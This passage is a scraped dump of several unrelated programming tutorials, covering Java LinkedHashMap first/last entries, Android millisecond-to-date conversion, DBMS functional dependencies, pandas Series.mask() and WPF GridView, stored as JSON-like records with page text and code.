28533, "text": "Get first and the value corresponding to the key." }, { "code": null, "e": 28634, "s": 28583, "text": "Print last and the value corresponding to the key." }, { "code": null, "e": 28781, "s": 28634, "text": "Pseudo Code:\nList<Integer> lKeys = new ArrayList<Integer>(LHM.keySet());\n// where LHM is name of LinkedHashMap and \n lKeys is name of List" }, { "code": null, "e": 28790, "s": 28781, "text": "Example " }, { "code": null, "e": 28795, "s": 28790, "text": "Java" }, { "code": "// Java Program to get first or last entry// from Java LinkedHashMap// By converting Map to List // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; // Main classclass GFG { // Main driver method public static void main(String[] args) { // Creating a LinkedHashMapc LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding elements to above LinkedHashMap // Custom inputs LHM.put(1, 8); LHM.put(2, 6); LHM.put(3, 7); LHM.put(4, 2); LHM.put(5, 5); // Creating a List List<Integer> lKeys = new ArrayList<Integer>(LHM.keySet()); // Condition check // If there is single element in List // Print key and value if (lKeys.size() > 0) { // Print first key form List System.out.println(\"First key: \" + lKeys.get(0)); // Print first value from List System.out.println(\"First value: \" + LHM.get(lKeys.get(0))); // Print last key from List System.out.println( \"Last key: \" + lKeys.get(lKeys.size() - 1)); // Print last value from List System.out.println( \"Last value: \" + LHM.get(lKeys.get(lKeys.size() - 1))); } }}", "e": 30230, "s": 28795, "text": null }, { "code": null, "e": 30284, "s": 30230, "text": "First key: 1\nFirst value: 8\nLast key: 5\nLast value: 5" }, { "code": null, "e": 30306, "s": 30284, "text": "Time Complexity: O(1)" }, { "code": null, "e": 30320, "s": 30308, "text": "anikaseth98" }, { "code": null, "e": 30339, "s": 30320, "text": "Java-LinkedHashMap" }, { "code": null, "e": 30346, "s": 30339, "text": "Picked" }, { "code": null, "e": 30370, "s": 30346, "text": "Technical Scripter 2020" }, { "code": null, "e": 30375, "s": 30370, "text": "Java" }, { "code": null, "e": 30389, "s": 30375, "text": "Java Programs" }, { "code": null, "e": 30408, "s": 30389, "text": "Technical Scripter" }, { "code": null, "e": 30413, "s": 30408, "text": "Java" }, { "code": null, "e": 30511, "s": 30413, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 30520, "s": 30511, "text": "Comments" }, { "code": null, "e": 30533, "s": 30520, "text": "Old Comments" }, { "code": null, "e": 30551, "s": 30533, "text": "Hashtable in Java" }, { "code": null, "e": 30572, "s": 30551, "text": "Constructors in Java" }, { "code": null, "e": 30618, "s": 30572, "text": "Different ways of Reading a text file in Java" }, { "code": null, "e": 30661, "s": 30618, "text": "Comparator Interface in Java with Examples" }, { "code": null, "e": 30701, "s": 30661, "text": "Java Math random() method with Examples" }, { "code": null, "e": 30745, "s": 30701, "text": "Convert a String to Character array in Java" }, { "code": null, "e": 30771, "s": 30745, "text": "Java Programming Examples" }, { "code": null, "e": 30805, "s": 30771, "text": "Convert Double to Integer in Java" }, { "code": null, "e": 30852, "s": 30805, "text": "Implementing a Linked List in Java using Class" } ]
How to convert milliseconds to date format in Android?
This example demonstrates how do I convert milliseconds to date format in android. Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project. Step 2 − Add the following code to res/layout/activity_main.xml. <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" android:orientation="vertical" android:padding="4dp" tools:context=".MainActivity"> <TextView android:textStyle="bold" android:textSize="24sp" android:id="@+id/textView" android:layout_width="match_parent" android:layout_height="wrap_content"/> </LinearLayout> Step 3 − Add the following code to src/MainActivity.java import androidx.appcompat.app.AppCompatActivity; import android.os.Bundle; import android.widget.TextView; import java.text.SimpleDateFormat; public class MainActivity extends AppCompatActivity { TextView textView; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); textView = findViewById(R.id.textView); getDate(); } private void getDate() { SimpleDateFormat simpleDateFormat = new SimpleDateFormat("dd/MM/yyyy"); String dateString = simpleDateFormat.format(9897546853323L); textView.setText(String.format("Date: %s", dateString)); } } Step 4 − Add the following code to androidManifest.xml <?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="app.com.sample"> <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/AppTheme"> <activity android:name=".MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> </activity> </application> </manifest> Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from the android studio, open one of your project's activity files and click Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen − Click here to download the project code.
[ { "code": null, "e": 1145, "s": 1062, "text": "This example demonstrates how do I convert milliseconds to date format in android." }, { "code": null, "e": 1274, "s": 1145, "text": "Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project." }, { "code": null, "e": 1339, "s": 1274, "text": "Step 2 − Add the following code to res/layout/activity_main.xml." }, { "code": null, "e": 1883, "s": 1339, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<LinearLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\n xmlns:tools=\"http://schemas.android.com/tools\"\n android:layout_width=\"match_parent\"\n android:layout_height=\"match_parent\"\n android:orientation=\"vertical\"\n android:padding=\"4dp\"\n tools:context=\".MainActivity\">\n <TextView\n android:textStyle=\"bold\"\n android:textSize=\"24sp\"\n android:id=\"@+id/textView\"\n android:layout_width=\"match_parent\"\n android:layout_height=\"wrap_content\"/>\n</LinearLayout>" }, { "code": null, "e": 1940, "s": 1883, "text": "Step 3 − Add the following code to src/MainActivity.java" }, { "code": null, "e": 2626, "s": 1940, "text": "import androidx.appcompat.app.AppCompatActivity;\nimport android.os.Bundle;\nimport android.widget.TextView;\nimport java.text.SimpleDateFormat;\npublic class MainActivity extends AppCompatActivity {\n TextView textView;\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_main);\n textView = findViewById(R.id.textView);\n getDate();\n }\n private void getDate() {\n SimpleDateFormat simpleDateFormat = new SimpleDateFormat(\"dd/MM/yyyy\");\n String dateString = simpleDateFormat.format(9897546853323L);\n textView.setText(String.format(\"Date: %s\", dateString));\n }\n}" }, { "code": null, "e": 2681, "s": 2626, "text": "Step 4 − Add the following code to androidManifest.xml" }, { "code": null, "e": 3351, "s": 2681, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"app.com.sample\">\n <application\n android:allowBackup=\"true\"\n android:icon=\"@mipmap/ic_launcher\"\n android:label=\"@string/app_name\"\n android:roundIcon=\"@mipmap/ic_launcher_round\"\n android:supportsRtl=\"true\"\n android:theme=\"@style/AppTheme\">\n <activity android:name=\".MainActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n </activity>\n </application>\n</manifest>" }, { "code": null, "e": 3702, "s": 3351, "text": "Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from the android studio, open one of your project's activity files and click Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen −" }, { "code": null, "e": 3743, "s": 3702, "text": "Click here to download the project code." } ]
Differentiate between Partial Dependency and Fully Functional Dependency - GeeksforGeeks
24 Dec, 2021 Fully Functional Dependency :If X and Y are an attribute set of a relation, Y is fully functional dependent on X, if Y is functionally dependent on X but not on any proper subset of X.Example –In the relation ABC->D, attribute D is fully functionally dependent on ABC and not on any proper subset of ABC. That means that subsets of ABC like AB, BC, A, B, etc cannot determine D.Let us take another example – Supply table From the table, we can clearly see that neither supplier_id nor item_id can uniquely determine the price but both supplier_id and item_id together can do so. So we can say that price is fully functionally dependent on { supplier_id, item_id }. This summarizes and gives our fully functional dependency − { supplier_id , item_id } -> price Partial Functional Dependency :A functional dependency X->Y is a partial dependency if Y is functionally dependent on X and Y can be determined by any proper subset of X.For example, we have a relationship AC->B, A->D, and D->B. Now if we compute the closure of {A+}=ADB Here A is alone capable of determining B, which means B is partially dependent on AC.Let us take another example – Student table Here, we can see that both the attributes name and roll_no alone are able to uniquely identify a course. Hence we can say that the relationship is partially dependent. Full Functional Dependency Partial Functional Dependency smithdashdash Picked DBMS GATE CS DBMS Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Types of Functional dependencies in DBMS Introduction of Relational Algebra in DBMS What is Temporary Table in SQL? Two Phase Locking Protocol KDD Process in Data Mining Layers of OSI Model TCP/IP Model Page Replacement Algorithms in Operating Systems Types of Operating Systems Differences between TCP and UDP
[ { "code": null, "e": 24329, "s": 24301, "text": "\n24 Dec, 2021" }, { "code": null, "e": 24740, "s": 24329, "text": "Fully Functional Dependency :If X and Y are an attribute set of a relation, Y is fully functional dependent on X, if Y is functionally dependent on X but not on any proper subset of X.Example –In the relation ABC->D, attribute D is fully functionally dependent on ABC and not on any proper subset of ABC. That means that subsets of ABC like AB, BC, A, B, etc cannot determine D.Let us take another example – " }, { "code": null, "e": 24754, "s": 24740, "text": "Supply table " }, { "code": null, "e": 25059, "s": 24754, "text": "From the table, we can clearly see that neither supplier_id nor item_id can uniquely determine the price but both supplier_id and item_id together can do so. So we can say that price is fully functionally dependent on { supplier_id, item_id }. This summarizes and gives our fully functional dependency −" }, { "code": null, "e": 25094, "s": 25059, "text": "{ supplier_id , item_id } -> price" }, { "code": null, "e": 25481, "s": 25094, "text": "Partial Functional Dependency :A functional dependency X->Y is a partial dependency if Y is functionally dependent on X and Y can be determined by any proper subset of X.For example, we have a relationship AC->B, A->D, and D->B. Now if we compute the closure of {A+}=ADB Here A is alone capable of determining B, which means B is partially dependent on AC.Let us take another example –" }, { "code": null, "e": 25495, "s": 25481, "text": "Student table" }, { "code": null, "e": 25663, "s": 25495, "text": "Here, we can see that both the attributes name and roll_no alone are able to uniquely identify a course. Hence we can say that the relationship is partially dependent." }, { "code": null, "e": 25691, "s": 25663, "text": "Full Functional Dependency " }, { "code": null, "e": 25721, "s": 25691, "text": "Partial Functional Dependency" }, { "code": null, "e": 25735, "s": 25721, "text": "smithdashdash" }, { "code": null, "e": 25742, "s": 25735, "text": "Picked" }, { "code": null, "e": 25747, "s": 25742, "text": "DBMS" }, { "code": null, "e": 25755, "s": 25747, "text": "GATE CS" }, { "code": null, "e": 25760, "s": 25755, "text": "DBMS" }, { "code": null, "e": 25858, "s": 25760, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 25899, "s": 25858, "text": "Types of Functional dependencies in DBMS" }, { "code": null, "e": 25942, "s": 25899, "text": "Introduction of Relational Algebra in DBMS" }, { "code": null, "e": 25974, "s": 25942, "text": "What is Temporary Table in SQL?" }, { "code": null, "e": 26001, "s": 25974, "text": "Two Phase Locking Protocol" }, { "code": null, "e": 26028, "s": 26001, "text": "KDD Process in Data Mining" }, { "code": null, "e": 26048, "s": 26028, "text": "Layers of OSI Model" }, { "code": null, "e": 26061, "s": 26048, "text": "TCP/IP Model" }, { "code": null, "e": 26110, "s": 26061, "text": "Page Replacement Algorithms in Operating Systems" }, { "code": null, "e": 26137, "s": 26110, "text": "Types of Operating Systems" } ]
Python | Pandas Series.mask() - GeeksforGeeks
11 Feb, 2019 Pandas series is a One-dimensional ndarray with axis labels. The labels need not be unique but must be a hashable type. The object supports both integer- and label-based indexing and provides a host of methods for performing operations involving the index. Pandas Series.mask() function is used for masking purpose. This function replace values where the passed condition is True. Otherwise the value remains same. Syntax: Series.mask(cond, other=nan, inplace=False, axis=None, level=None, errors=’raise’, try_cast=False, raise_on_error=None) Parameter :cond : Where cond is False, keep the original value. Where True, replace with corresponding value from other.other : Entries where cond is True are replaced with corresponding value from other.inplace : Whether to perform the operation in place on the data.axis : Alignment axis if needed.level : Alignment level if needed. Returns : wh : same type as caller Example #1: Use Series.mask() function to replace the ‘Rio’ city in the given series object. # importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(['New York', 'Chicago', 'Toronto', 'Lisbon', 'Rio']) # Create the Indexindex_ = ['City 1', 'City 2', 'City 3', 'City 4', 'City 5'] # set the indexsr.index = index_ # Print the seriesprint(sr) Output : Now we will use Series.mask() function to replace the ‘Rio’ city in the given series object. # replace 'Rio' with 'Tokyo'result = sr.mask(lambda x : x =='Rio', other = 'Tokyo') # Print the resultprint(result) Output : As we can see in the output, the Series.mask() function has successfully replaced the ‘Rio’ city with ‘Tokyo’ in the given series object. Example #2: Use Series.mask() function to mask all the values in the given series object which are greater than 50. # importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series([11, 21, 8, 18, 65, 84, 32, 10, 5, 24, 32]) # Print the seriesprint(sr) Output : Now we will use Series.mask() function to mask all the values greater than 50 in the given series object. # mask values greater than 50result = sr.mask(sr > 50) # Print the resultprint(result) Output :As we can see in the output, the Series.mask() function has successfully masked all the values greater than 50 in the given series object. Python pandas-series Python pandas-series-methods Python-pandas Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Box Plot in Python using Matplotlib Python | Get dictionary keys as a list Bar Plot in Matplotlib Multithreading in Python | Set 2 (Synchronization) Python Dictionary keys() method loops in python Python - Call function from another file Ways to filter Pandas DataFrame by column values Python | Convert set into a list Python program to find number of days between two given dates
[ { "code": null, "e": 23901, "s": 23873, "text": "\n11 Feb, 2019" }, { "code": null, "e": 24158, "s": 23901, "text": "Pandas series is a One-dimensional ndarray with axis labels. The labels need not be unique but must be a hashable type. The object supports both integer- and label-based indexing and provides a host of methods for performing operations involving the index." }, { "code": null, "e": 24316, "s": 24158, "text": "Pandas Series.mask() function is used for masking purpose. This function replace values where the passed condition is True. Otherwise the value remains same." }, { "code": null, "e": 24444, "s": 24316, "text": "Syntax: Series.mask(cond, other=nan, inplace=False, axis=None, level=None, errors=’raise’, try_cast=False, raise_on_error=None)" }, { "code": null, "e": 24779, "s": 24444, "text": "Parameter :cond : Where cond is False, keep the original value. Where True, replace with corresponding value from other.other : Entries where cond is True are replaced with corresponding value from other.inplace : Whether to perform the operation in place on the data.axis : Alignment axis if needed.level : Alignment level if needed." }, { "code": null, "e": 24814, "s": 24779, "text": "Returns : wh : same type as caller" }, { "code": null, "e": 24907, "s": 24814, "text": "Example #1: Use Series.mask() function to replace the ‘Rio’ city in the given series object." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(['New York', 'Chicago', 'Toronto', 'Lisbon', 'Rio']) # Create the Indexindex_ = ['City 1', 'City 2', 'City 3', 'City 4', 'City 5'] # set the indexsr.index = index_ # Print the seriesprint(sr)", "e": 25184, "s": 24907, "text": null }, { "code": null, "e": 25193, "s": 25184, "text": "Output :" }, { "code": null, "e": 25286, "s": 25193, "text": "Now we will use Series.mask() function to replace the ‘Rio’ city in the given series object." }, { "code": "# replace 'Rio' with 'Tokyo'result = sr.mask(lambda x : x =='Rio', other = 'Tokyo') # Print the resultprint(result)", "e": 25403, "s": 25286, "text": null }, { "code": null, "e": 25412, "s": 25403, "text": "Output :" }, { "code": null, "e": 25666, "s": 25412, "text": "As we can see in the output, the Series.mask() function has successfully replaced the ‘Rio’ city with ‘Tokyo’ in the given series object. Example #2: Use Series.mask() function to mask all the values in the given series object which are greater than 50." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series([11, 21, 8, 18, 65, 84, 32, 10, 5, 24, 32]) # Print the seriesprint(sr)", "e": 25820, "s": 25666, "text": null }, { "code": null, "e": 25829, "s": 25820, "text": "Output :" }, { "code": null, "e": 25935, "s": 25829, "text": "Now we will use Series.mask() function to mask all the values greater than 50 in the given series object." }, { "code": "# mask values greater than 50result = sr.mask(sr > 50) # Print the resultprint(result)", "e": 26023, "s": 25935, "text": null }, { "code": null, "e": 26170, "s": 26023, "text": "Output :As we can see in the output, the Series.mask() function has successfully masked all the values greater than 50 in the given series object." }, { "code": null, "e": 26191, "s": 26170, "text": "Python pandas-series" }, { "code": null, "e": 26220, "s": 26191, "text": "Python pandas-series-methods" }, { "code": null, "e": 26234, "s": 26220, "text": "Python-pandas" }, { "code": null, "e": 26241, "s": 26234, "text": "Python" }, { "code": null, "e": 26339, "s": 26241, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26348, "s": 26339, "text": "Comments" }, { "code": null, "e": 26361, "s": 26348, "text": "Old Comments" }, { "code": null, "e": 26397, "s": 26361, "text": "Box Plot in Python using Matplotlib" }, { "code": null, "e": 26436, "s": 26397, "text": "Python | Get dictionary keys as a list" }, { "code": null, "e": 26459, "s": 26436, "text": "Bar Plot in Matplotlib" }, { "code": null, "e": 26510, "s": 26459, "text": "Multithreading in Python | Set 2 (Synchronization)" }, { "code": null, "e": 26542, "s": 26510, "text": "Python Dictionary keys() method" }, { "code": null, "e": 26558, "s": 26542, "text": "loops in python" }, { "code": null, "e": 26599, "s": 26558, "text": "Python - Call function from another file" }, { "code": null, "e": 26648, "s": 26599, "text": "Ways to filter Pandas DataFrame by column values" }, { "code": null, "e": 26681, "s": 26648, "text": "Python | Convert set into a list" } ]
WPF - Gridview
A GridView is a control that displays data items in rows and columns. Actually a ListView displays data. By default, it contains a GridView. The hierarchical inheritance of GridView class is as follows − Background Gets or sets a brush that provides the background of the control. (Inherited from Control) BorderThickness Gets or sets the border thickness of a control. (Inherited from Control) DataContext Gets or sets the data context for a FrameworkElement when it participates in data binding. (Inherited from FrameworkElement) FontFamily Gets or sets the font used to display text in the control. (Inherited from Control) FontSize Gets or sets the size of the text in this control. (Inherited from Control) FontStyle Gets or sets the style in which the text is rendered. (Inherited from Control) FontWeight Gets or sets the thickness of the specified font. (Inherited from Control) Foreground Gets or sets a brush that describes the foreground color. (Inherited from Control) GroupStyle Gets a collection of GroupStyle objects that define the appearance of each level of groups. (Inherited from ItemsControl) Header Gets or sets the content for the list header. (Inherited from ListViewBase) Height Gets or sets the suggested height of a FrameworkElement. (Inherited from FrameworkElement) HorizontalAlignment Gets or sets the horizontal alignment characteristics that are applied to a FrameworkElement when it is composed in a layout parent, such as a panel or items control. (Inherited from FrameworkElement) HorizontalContentAlignment Gets or sets the horizontal alignment of the control's content. (Inherited from Control) Items Gets the collection used to generate the content of the control. (Inherited from ItemsControl) ItemsSource Gets or sets an object source used to generate the content of the ItemsControl. (Inherited from ItemsControl) ItemTemplate Gets or sets the DataTemplate used to display each item. (Inherited from ItemsControl) Margin Gets or sets the outer margin of a FrameworkElement. (Inherited from FrameworkElement) Name Gets or sets the identifying name of the object. When a XAML processor creates the object tree from XAML markup, run-time code can refer to the XAML-declared object by this name. (Inherited from FrameworkElement) Opacity Gets or sets the degree of the object's opacity. (Inherited from UIElement) Resources Gets the locally defined resource dictionary. In XAML, you can establish resource items as child object elements of a frameworkElement.Resources property element, through XAML implicit collection syntax. (Inherited from FrameworkElement) SelectedIndex Gets or sets the index of the selected item. (Inherited from Selector) SelectedItem Gets or sets the selected item. (Inherited from Selector) SelectedItems Gets the currently selected items. (Inherited from ListViewBase) SelectedRanges Gets a collection of ItemIndexRange objects that describe the currently selected items in the list. (Inherited from ListViewBase) SelectedValue Gets or sets the value of the selected item, obtained by using the SelectedValuePath. (Inherited from Selector) Style Gets or sets an instance Style that is applied for this object during layout and rendering. (Inherited from FrameworkElement) VerticalAlignment Gets or sets the vertical alignment characteristics that are applied to a FrameworkElement when it is composed in a parent object such as a panel or items control. (Inherited from FrameworkElement) VerticalContentAlignment Gets or sets the vertical alignment of the control's content. (Inherited from Control) Width Gets or sets the width of a FrameworkElement. (Inherited from FrameworkElement) DataContextChanged Occurs when the value of the FrameworkElement.DataContext property changes. (Inherited from FrameworkElement) DragEnter Occurs when the input system reports an underlying drag event with this element as the target. (Inherited from UIElement) DragLeave Occurs when the input system reports an underlying drag event with this element as the origin. (Inherited from UIElement) DragOver Occurs when the input system reports an underlying drag event with this element as the potential drop target. (Inherited from UIElement) DragStarting Occurs when a drag operation is initiated. (Inherited from UIElement) Drop Occurs when the input system reports an underlying drop event with this element as the drop target. (Inherited from UIElement) ImageFailed Occurs when there is an error associated with image retrieval or format. ImageOpened Occurs when the image source is downloaded and decoded with no failure. You can use this event to determine the natural size of the image source. KeyDown Occurs when a keyboard key is pressed while the UIElement has focus. (Inherited from UIElement) KeyUp when a keyboard key is released while the UIElement has focus. (Inherited from UIElement) Arrange Positions child objects and determines a size for a UIElement. Parent objects that implement custom layout for their child elements should call this method from their layout override implementations to form a recursive layout update. (Inherited from UIElement) ClearValue Clears the local value of a dependency property. (Inherited from DependencyObject) FindName Retrieves an object that has the specified identifier name. (Inherited from FrameworkElement) GetValue Returns the current effective value of a dependency property from a DependencyObject. (Inherited from DependencyObject) ReadLocalValue Returns the local value of a dependency property, if a local value is set. (Inherited from DependencyObject) SetBinding Attaches a binding to a FrameworkElement, using the provided binding object. (Inherited from FrameworkElement) SetValue Sets the local value of a dependency property on a DependencyObject. (Inherited from DependencyObject) Let’s take an example to understand the concept better. Start by creating a new WPF project with the name WPFGridView. Let’s take an example to understand the concept better. Start by creating a new WPF project with the name WPFGridView. Drag a grid view control from the Toolbox. Drag a grid view control from the Toolbox. The following example shows the data in grid like table. The following example shows the data in grid like table. The following XAML code creates and implements a GridView. The following XAML code creates and implements a GridView. <Window x:Class = "WPFGridView.MainWindow" xmlns = "http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x = "http://schemas.microsoft.com/winfx/2006/xaml" Title = "MainWindow" Height = "350" Width = "525"> <Grid> <ListView HorizontalAlignment = "Left" Height = "299" Margin = "10,10,0,0" VerticalAlignment = "Top" Width = "497"Name = "MenList"> <ListView.View> <GridView> <GridViewColumn Header = "Name" DisplayMemberBinding = "{Binding Name}" Width = "100"/> <GridViewColumn Header = "ID" DisplayMemberBinding = "{Binding ID}" Width = "100"/> <GridViewColumn Header = "Age" DisplayMemberBinding = "{Binding Age}" Width = "100"/> </GridView> </ListView.View> </ListView> </Grid> </Window> Here is the C# implementation in which person class is implemented. using System; using System.Windows; using System.Windows.Controls; namespace WPFGridView { /// <summary> /// Interaction logic for MainWindow.xaml /// </summary> public partial class MainWindow : Window { public MainWindow() { InitializeComponent(); MenList.Items.Add(new Person() {Name = "Ali", ID = "123A", Age = 20 }); MenList.Items.Add(new Person() {Name = "Akram",ID= "456X", Age = 35 }); MenList.Items.Add(new Person() {Name = "Salman",ID="333E", Age = 49 }); } } class Person { public string Name { get; set; } public string ID { get; set; } public int Age { get; set; } } } When you compile and execute the above code, it will produce the following output. We recommend that you execute the above example code and try the other properties and events of GridView. 31 Lectures 2.5 hours Anadi Sharma 30 Lectures 2.5 hours Taurius Litvinavicius Print Add Notes Bookmark this page
[ { "code": null, "e": 2224, "s": 2020, "text": "A GridView is a control that displays data items in rows and columns. Actually a ListView displays data. By default, it contains a GridView. The hierarchical inheritance of GridView class is as follows −" }, { "code": null, "e": 2235, "s": 2224, "text": "Background" }, { "code": null, "e": 2326, "s": 2235, "text": "Gets or sets a brush that provides the background of the control. (Inherited from Control)" }, { "code": null, "e": 2342, "s": 2326, "text": "BorderThickness" }, { "code": null, "e": 2415, "s": 2342, "text": "Gets or sets the border thickness of a control. (Inherited from Control)" }, { "code": null, "e": 2427, "s": 2415, "text": "DataContext" }, { "code": null, "e": 2552, "s": 2427, "text": "Gets or sets the data context for a FrameworkElement when it participates in data binding. (Inherited from FrameworkElement)" }, { "code": null, "e": 2563, "s": 2552, "text": "FontFamily" }, { "code": null, "e": 2647, "s": 2563, "text": "Gets or sets the font used to display text in the control. (Inherited from Control)" }, { "code": null, "e": 2656, "s": 2647, "text": "FontSize" }, { "code": null, "e": 2732, "s": 2656, "text": "Gets or sets the size of the text in this control. (Inherited from Control)" }, { "code": null, "e": 2742, "s": 2732, "text": "FontStyle" }, { "code": null, "e": 2821, "s": 2742, "text": "Gets or sets the style in which the text is rendered. (Inherited from Control)" }, { "code": null, "e": 2832, "s": 2821, "text": "FontWeight" }, { "code": null, "e": 2907, "s": 2832, "text": "Gets or sets the thickness of the specified font. (Inherited from Control)" }, { "code": null, "e": 2918, "s": 2907, "text": "Foreground" }, { "code": null, "e": 3001, "s": 2918, "text": "Gets or sets a brush that describes the foreground color. (Inherited from Control)" }, { "code": null, "e": 3012, "s": 3001, "text": "GroupStyle" }, { "code": null, "e": 3134, "s": 3012, "text": "Gets a collection of GroupStyle objects that define the appearance of each level of groups. (Inherited from ItemsControl)" }, { "code": null, "e": 3141, "s": 3134, "text": "Header" }, { "code": null, "e": 3217, "s": 3141, "text": "Gets or sets the content for the list header. (Inherited from ListViewBase)" }, { "code": null, "e": 3224, "s": 3217, "text": "Height" }, { "code": null, "e": 3315, "s": 3224, "text": "Gets or sets the suggested height of a FrameworkElement. (Inherited from FrameworkElement)" }, { "code": null, "e": 3335, "s": 3315, "text": "HorizontalAlignment" }, { "code": null, "e": 3536, "s": 3335, "text": "Gets or sets the horizontal alignment characteristics that are applied to a FrameworkElement when it is composed in a layout parent, such as a panel or items control. (Inherited from FrameworkElement)" }, { "code": null, "e": 3563, "s": 3536, "text": "HorizontalContentAlignment" }, { "code": null, "e": 3652, "s": 3563, "text": "Gets or sets the horizontal alignment of the control's content. (Inherited from Control)" }, { "code": null, "e": 3658, "s": 3652, "text": "Items" }, { "code": null, "e": 3753, "s": 3658, "text": "Gets the collection used to generate the content of the control. (Inherited from ItemsControl)" }, { "code": null, "e": 3765, "s": 3753, "text": "ItemsSource" }, { "code": null, "e": 3875, "s": 3765, "text": "Gets or sets an object source used to generate the content of the ItemsControl. (Inherited from ItemsControl)" }, { "code": null, "e": 3888, "s": 3875, "text": "ItemTemplate" }, { "code": null, "e": 3975, "s": 3888, "text": "Gets or sets the DataTemplate used to display each item. (Inherited from ItemsControl)" }, { "code": null, "e": 3982, "s": 3975, "text": "Margin" }, { "code": null, "e": 4069, "s": 3982, "text": "Gets or sets the outer margin of a FrameworkElement. (Inherited from FrameworkElement)" }, { "code": null, "e": 4074, "s": 4069, "text": "Name" }, { "code": null, "e": 4287, "s": 4074, "text": "Gets or sets the identifying name of the object. When a XAML processor creates the object tree from XAML markup, run-time code can refer to the XAML-declared object by this name. (Inherited from FrameworkElement)" }, { "code": null, "e": 4295, "s": 4287, "text": "Opacity" }, { "code": null, "e": 4371, "s": 4295, "text": "Gets or sets the degree of the object's opacity. (Inherited from UIElement)" }, { "code": null, "e": 4381, "s": 4371, "text": "Resources" }, { "code": null, "e": 4619, "s": 4381, "text": "Gets the locally defined resource dictionary. In XAML, you can establish resource items as child object elements of a frameworkElement.Resources property element, through XAML implicit collection syntax. (Inherited from FrameworkElement)" }, { "code": null, "e": 4633, "s": 4619, "text": "SelectedIndex" }, { "code": null, "e": 4704, "s": 4633, "text": "Gets or sets the index of the selected item. (Inherited from Selector)" }, { "code": null, "e": 4717, "s": 4704, "text": "SelectedItem" }, { "code": null, "e": 4775, "s": 4717, "text": "Gets or sets the selected item. (Inherited from Selector)" }, { "code": null, "e": 4789, "s": 4775, "text": "SelectedItems" }, { "code": null, "e": 4854, "s": 4789, "text": "Gets the currently selected items. (Inherited from ListViewBase)" }, { "code": null, "e": 4869, "s": 4854, "text": "SelectedRanges" }, { "code": null, "e": 4999, "s": 4869, "text": "Gets a collection of ItemIndexRange objects that describe the currently selected items in the list. (Inherited from ListViewBase)" }, { "code": null, "e": 5013, "s": 4999, "text": "SelectedValue" }, { "code": null, "e": 5125, "s": 5013, "text": "Gets or sets the value of the selected item, obtained by using the SelectedValuePath. (Inherited from Selector)" }, { "code": null, "e": 5131, "s": 5125, "text": "Style" }, { "code": null, "e": 5257, "s": 5131, "text": "Gets or sets an instance Style that is applied for this object during layout and rendering. (Inherited from FrameworkElement)" }, { "code": null, "e": 5275, "s": 5257, "text": "VerticalAlignment" }, { "code": null, "e": 5473, "s": 5275, "text": "Gets or sets the vertical alignment characteristics that are applied to a FrameworkElement when it is composed in a parent object such as a panel or items control. (Inherited from FrameworkElement)" }, { "code": null, "e": 5498, "s": 5473, "text": "VerticalContentAlignment" }, { "code": null, "e": 5585, "s": 5498, "text": "Gets or sets the vertical alignment of the control's content. (Inherited from Control)" }, { "code": null, "e": 5591, "s": 5585, "text": "Width" }, { "code": null, "e": 5671, "s": 5591, "text": "Gets or sets the width of a FrameworkElement. (Inherited from FrameworkElement)" }, { "code": null, "e": 5690, "s": 5671, "text": "DataContextChanged" }, { "code": null, "e": 5800, "s": 5690, "text": "Occurs when the value of the FrameworkElement.DataContext property changes. (Inherited from FrameworkElement)" }, { "code": null, "e": 5810, "s": 5800, "text": "DragEnter" }, { "code": null, "e": 5932, "s": 5810, "text": "Occurs when the input system reports an underlying drag event with this element as the target. (Inherited from UIElement)" }, { "code": null, "e": 5942, "s": 5932, "text": "DragLeave" }, { "code": null, "e": 6064, "s": 5942, "text": "Occurs when the input system reports an underlying drag event with this element as the origin. (Inherited from UIElement)" }, { "code": null, "e": 6073, "s": 6064, "text": "DragOver" }, { "code": null, "e": 6210, "s": 6073, "text": "Occurs when the input system reports an underlying drag event with this element as the potential drop target. (Inherited from UIElement)" }, { "code": null, "e": 6223, "s": 6210, "text": "DragStarting" }, { "code": null, "e": 6293, "s": 6223, "text": "Occurs when a drag operation is initiated. (Inherited from UIElement)" }, { "code": null, "e": 6298, "s": 6293, "text": "Drop" }, { "code": null, "e": 6425, "s": 6298, "text": "Occurs when the input system reports an underlying drop event with this element as the drop 